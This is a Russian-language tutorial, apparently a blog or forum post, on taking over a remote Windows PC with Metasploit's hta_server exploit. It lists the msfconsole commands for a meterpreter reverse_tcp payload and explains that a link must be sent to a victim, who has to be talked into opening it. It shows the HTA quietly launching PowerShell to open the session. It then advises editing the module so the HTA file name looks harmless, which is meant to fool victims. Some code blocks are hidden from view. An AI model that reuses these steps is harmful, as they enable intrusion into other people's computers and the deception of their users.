Взлом удаленного ПК. HTA-server

Взлом удаленного ПК. HTA-server

Hlink
Взлом удаленного ПК. HTA-server.

 

Всем привет! В этой статье я хочу показать взлом удаленного компьютера, а точнее, получение сессии meterpreter c помощью эксплойта - hta_server.

Появился он недавно в версии Metasploit Framework v4.12.34,


Взлом удаленного ПК. HTA-server.

 


так, что прежде чем начать убеждаемся в ее наличии, если отсутствует, обновляемся:


> apt-get update && apt-get upgrade –y && apt-get dist-upgrade


Запускаем Metasploit Framework:


> msfconsole


В появившейся консоли фреймворка пишем:

use exploit/windows/misc/hta_server
set payload /windows/meterpreter/reverse_tcp
set LHOST 172.16.0.160
set SRVHOST 172.16.0.160
set LPORT 4444
exploit 
Вы не можете просматривать этот текст.


Теперь, если все проделано, верно, видим экран с таким содержимым:


Взлом удаленного ПК. HTA-server.

 Теперь немного теории, первая строка обозначает, что обратное подключение (от жертвы) ожидается на адресе 172.16.0.160 и порту 4444.

Вторая, это ссылка которую необходимо доставить нашей цели, но не просто доставить, а убедить в том, что по ней необходимо перейти 

А третья, собственно, о том, что был поднят веб-сервер на локальном адресе.

Перейдем по ссылке на целевой машине:


Взлом удаленного ПК. HTA-server.

 


Вернувшись к консоли линукс, мы видим, что сервер сообщает о доставке полезной нагрузки обратившемуся к нему адресу 172.16.0.139.


Взлом удаленного ПК. HTA-server.

 Вернемся к целевому хосту и скачаем то, что было предложено сервером.


Взлом удаленного ПК. HTA-server.

 Как видно, сервер сгенерировал нам некое приложение .hta - HTML Application (HTA) — приложение, написанное на HTML или Dynamic HTML.


Взлом удаленного ПК. HTA-server.

 После запуска получаем готовую рабочую сессию meterpreter.


Взлом удаленного ПК. HTA-server.

 Объясню, как это происходит, созданное приложение открыло в фоновом режиме другое приложение, которое может работать скрытно от глаз пользователя, зовется оно PowerShell - Представляет собой современную стандартизированную оболочку командной строки, обеспечивающую большую гибкость управления компьютером на базе операционной системы Windows. По сути, PowerShell — это та же командная строка, но только намного более функциональная. Увидеть ее можно, набрав в пуске - powershell


Взлом удаленного ПК. HTA-server.

 PowerShell содержащий полезную нагрузку обнаруживается в диспетчере задач:


Взлом удаленного ПК. HTA-server.

 Итак, по поводу нагрузки все ясно. Дальнейшие действия зависят от фантазии.


Я бы хотел обратить внимание на один очень важный, по моему мнению момент. Взглянем на исходный код скрипта, который находится /usr/share/metasploit-framework/modules/exploit/windows/misc/hta_server.rb написан он на Ruby:

Вы не можете просматривать этот текст.


Строка '/' + Rex::Text.rand_text_alphanumeric(rand(10) + 6) + '.hta' определяет название выходного файла. Данный метод генерирует абсолютную дичь, состоящую из 10 + -рандомных чисел и букв. (Fg8FGn34f9.hta) Предлагаю исправить это на более приемлемый вариант.


Делается это путем изменения метода .rand_text_alphanumeric на метод .uri_encode


Взлом удаленного ПК. HTA-server.

 

В одинарных кавычках пишем, все что угодно. На этом все. Спасибо за внимание.

P.S. Осталось подумать, как приделать к нему более симпатичный ярлык…

P.P.S. Статья не является руководством к действию и опубликована исключительно в ознакомительных целях. За последствия вызванные применением данного метода на практике автор и ресурс, ответственности не несут.



Report Page